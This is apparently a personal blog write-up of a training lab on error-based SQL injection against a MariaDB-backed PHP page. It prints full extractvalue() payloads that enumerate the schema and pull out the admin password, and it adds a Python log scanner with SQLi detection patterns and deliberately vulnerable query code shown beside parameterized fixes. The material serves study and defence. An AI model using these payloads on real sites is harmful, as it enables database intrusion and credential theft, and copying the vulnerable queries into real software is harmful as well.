Jastes 2023. 7. 12. 19:29

 

SQL Injection Basics

💡 This is a restatement of material from pentestqym; all copyright belongs to that site. This time, let's look at what SQL Injection is and how it is carried out. SQL Injection? SQL Injection

dystopia050119.tistory.com


Error-base SQLi WriteUp

Let's practise error-based SQLi hands-on. Create the lab environment linked at the top of this training, test error-based SQLi yourself and work through the missions. First, some material worth reading beforehand.

 

Error-based SQL Injection

💡 This is a restatement of material from pentestqym; all copyright belongs to that site. Let's learn about error-based SQLi. Error based SQLi Using database error messages to

dystopia050119.tistory.com


Exercise 1. 

In this exercise the parameter is bound to a string-type column used in the WHERE clause.

 

1. First check the URL (the argument is passed via GET), then identify which DBMS is behind it

- Then check whether SQLi is possible by sending a single quote (another character would also do)

http://<lab IP address>/sqli_err_ex1.php?name=Faye%20Valentine%27
Look at the part requested via GET (it appears to run a SELECT against the DB and extract the result)
It works.

By the way, I didn't upload the screenshots here, but if you read the page source, a comment tells you the attack type and whether a filter is in place, haha

DB identified from the error message: MariaDB (MySQL)
 

MySQL :: MySQL 8.0 Reference Manual :: 26.3.31 The INFORMATION_SCHEMA SCHEMATA Table

26.3.31 The INFORMATION_SCHEMA SCHEMATA Table A schema is a database, so the SCHEMATA table provides information about databases. The SCHEMATA table has these columns: CATALOG_NAME The name of the catalog to which the schema belongs. This value is always

dev.mysql.com

 

MySQL :: MySQL 8.0 Reference Manual :: 26.8 Extensions to SHOW Statements

26.8 Extensions to SHOW Statements Some extensions to SHOW statements accompany the implementation of INFORMATION_SCHEMA: SHOW can be used to get information about the structure of INFORMATION_SCHEMA itself. Several SHOW statements accept a WHERE clause t

dev.mysql.com

Let's refer to the official documentation above as we go.


2. Identify the database name in use & the table names

We identified the DBMS above, right? Now let's find the database name directly.

%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, schema_name) FROM information_schema.schemata LIMIT 3,1)))-- -

By the way, concat doesn't strictly have to be used (so why does the course keep telling us to use it here?)

The reason extractvalue() is used is to get the value displayed on screen (but it can only show a single column (one row) at a time).

This result comes from looking up the relevant column in the metadata store information_schema.schemata (MySQL/MariaDB's own information: constraints and so on).

 

MySQL :: MySQL 8.0 Reference Manual :: 26.1 Introduction

INFORMATION_SCHEMA provides access to database metadata, information about the MySQL server such as the name of a database or table, the data type of a column, or access privileges. Other terms that are sometimes used for this information are data dictiona

dev.mysql.com

Let's work through it with the material above as a reference.


3. Enumerate the tables
%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, table_name) FROM information_schema.tables WHERE table_schema='mydb' LIMIT 3,1)))-- -

Now that we have the table (users) that holds the user data, on to the next step


4. Identify the user account (ID) and password columns
/* Username columns */
%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, column_name) FROM information_schema.columns WHERE table_name='users' LIMIT 5,1)))-- -

/* Password columns */
%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='users' LIMIT 6,1)))-- -

5. admin password crack

Since we now know the table name, its structure and each column, let's extract the password directly.

%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(user_name, 0x3a, password) FROM users LIMIT 0,1)))-- -
pass!!

So in the end we got the result

ID : Administrator(admin)
PW : pass
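The five steps above all share one request shape: a quoted or arithmetic value in a GET parameter, extractvalue(), information_schema, a trailing comment, and a 5xx response when the DB error fires. As an added example (not from the original post or the training site), here is a small Python checker that walks constructed access-log lines modelled on the exercise and flags those traits; treating `emp_no` as an integer-only parameter is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache-style access-log lines modelled on the two exercises
# (not real traffic); the third line carries the step-2 payload from above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2023:19:29:01 +0900] "GET /sqli_err_ex1.php?name=Faye%20Valentine HTTP/1.1" 200 512
10.0.0.5 - - [12/Jul/2023:19:29:07 +0900] "GET /sqli_err_ex1.php?name=Faye%20Valentine%27 HTTP/1.1" 500 210
10.0.0.5 - - [12/Jul/2023:19:30:15 +0900] "GET /sqli_err_ex1.php?name=Faye%20Valentine%27%20AND%20extractvalue(rand(),%20concat(0x3a,%20(SELECT%20concat(0x3a,%20schema_name)%20FROM%20information_schema.schemata%20LIMIT%203,1)))--%20- HTTP/1.1" 500 340
10.0.0.5 - - [12/Jul/2023:19:31:02 +0900] "GET /sqli_err_ex2.php?emp_no=1%2B2 HTTP/1.1" 200 498
10.0.0.9 - - [12/Jul/2023:19:31:40 +0900] "GET /sqli_err_ex2.php?emp_no=3 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Markers of the technique on this page: the XML error function, the metadata
# schema, and the "-- " comment that discards the rest of the original query.
MARKERS = re.compile(r"\bextractvalue\s*\(|information_schema\.|--\s", re.IGNORECASE)
NUMERIC_PARAMS = {"emp_no"}  # assumption: parameters the app defines as integer ids

def analyze_line(line):
    """Return a finding dict for one log line, or None if nothing looks wrong."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    reasons = []
    for key, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(raw)  # second decode catches double-encoded payloads
        if MARKERS.search(value):
            reasons.append(f"{key}: error-based SQLi marker in value")
        elif key in NUMERIC_PARAMS and not value.strip().lstrip("-").isdigit():
            reasons.append(f"{key}: non-integer value {value!r} in numeric parameter")
        elif "'" in value and m.group("status").startswith("5"):
            reasons.append(f"{key}: quote followed by server error (probe)")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "path": urlsplit(target).path,
            "status": m.group("status"), "reasons": reasons}

def scan(log_text):
    """Run the per-line check over a whole log and keep only the findings."""
    return [hit for hit in map(analyze_line, log_text.splitlines()) if hit]
```

The quote-plus-5xx rule is the noisiest of the three and is best correlated with the DB error log rather than alerted on alone.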

 

Exercise 2.

In this exercise, submitting a single quote (') in the parameter value shows a DB syntax error message, but the method used in exercise 1 will not extract the data you want. Note that here the parameter is bound to a numeric-type column in the DB.

1. First check the URL (the argument is passed via GET), then identify which DBMS is behind it

- Then check whether SQLi is possible by sending a single quote (another character would also do)

http://<lab IP address>/sqli_err_ex2.php?emp_no=1%2B2

If you send this, the page comes back normally, just as when you first opened exercise 2, so SQLi is possible. Note that %2B is +; if URL-encoding it like that is a bit of a hassle, you can just use - instead.


2. Identify the database name in use & the table names

We identified the DBMS above, right? Now let's find the database name directly. Neither the protection mechanism nor the DB has changed much from what we did above, so I'll just show the code and leave it there.

 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, schema_name) FROM information_schema.schemata LIMIT 3,1)))-- -

3. Enumerate the tables
 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, table_name) FROM information_schema.tables WHERE table_schema='mydb' LIMIT 3,1)))-- -

4. Identify the user account (ID) and password columns
/* Username columns */
 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, column_name) FROM information_schema.columns WHERE table_name='users' LIMIT 5,1)))-- -

/* Password columns */
 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='users' LIMIT 6,1)))-- -

5. admin password crack

Since we now know the table name, its structure and each column, let's extract the password directly.

 AND extractvalue(rand(), concat(0x3a, (SELECT concat(user_name, 0x3a, password) FROM users LIMIT 0,1)))-- -

The result and the approach are... exactly the same.. I thought about writing exploit code in Python.. but I'll do that later
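Both exercises come down to the same server-side defect: the parameter is spliced into the SQL text, once inside quotes (exercise 1) and once bare in a numeric comparison (exercise 2, where 1+2 is evaluated). As an added example (not the site's code and not the exploit the author mentions), the block below reconstructs both shapes in Python over an in-memory SQLite stand-in for MariaDB and puts the hardened versions next to them; the users rows and the emp_no column are constructed assumptions.

```python
import sqlite3
# SQLite stands in for MariaDB; schema and rows are constructed to mirror
# the exercise (users table, admin/pass) and are not the lab's real data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (emp_no INTEGER, user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Faye Valentine", "secret1"), (3, "admin", "pass")])
    return conn

# --- Vulnerable shapes (hypothetical reconstruction of sqli_err_ex1/ex2) ---
def vulnerable_by_name(conn, name):
    # Exercise 1: value spliced inside quotes; a trailing ' leaves the string
    # literal unterminated and the DB raises the error message the page reads.
    sql = "SELECT user_name FROM users WHERE user_name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]

def vulnerable_by_emp_no(conn, emp_no):
    # Exercise 2: numeric column, no quotes; "1+2" is valid arithmetic and
    # silently becomes emp_no = 3, which is why the page loads normally.
    sql = "SELECT user_name FROM users WHERE emp_no = " + emp_no
    return [row[0] for row in conn.execute(sql)]

# --- Hardened shapes: bound parameters plus type validation ---
def safe_by_name(conn, name):
    # Value travels separately from the SQL text: a quote is data, not syntax.
    return [row[0] for row in conn.execute(
        "SELECT user_name FROM users WHERE user_name = ?", (name,))]

def safe_by_emp_no(conn, emp_no):
    # Numeric context: convert first and bind an int. Binding the raw string is
    # not enough on MySQL, which would cast '1+2' to 1 inside the comparison.
    try:
        value = int(emp_no)
    except (TypeError, ValueError):
        return None  # "1+2", "", "abc" are refused before any query runs
    return [row[0] for row in conn.execute(
        "SELECT user_name FROM users WHERE emp_no = ?", (value,))]

def demo():
    conn = make_db()
    out = {}
    try:
        vulnerable_by_name(conn, "Faye Valentine'")
        out["ex1_vulnerable"] = "no error"
    except sqlite3.OperationalError as exc:
        out["ex1_vulnerable"] = "DB error: " + str(exc)  # what error-based SQLi reads
    out["ex2_vulnerable"] = vulnerable_by_emp_no(conn, "1+2")  # ['admin']
    out["ex1_safe"] = safe_by_name(conn, "Faye Valentine'")     # []
    out["ex2_safe"] = safe_by_emp_no(conn, "1+2")               # None
    return out
```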

 

It's still unfinished and I wasn't really planning to post it yet.. but I'm taking the easy way out today, haha..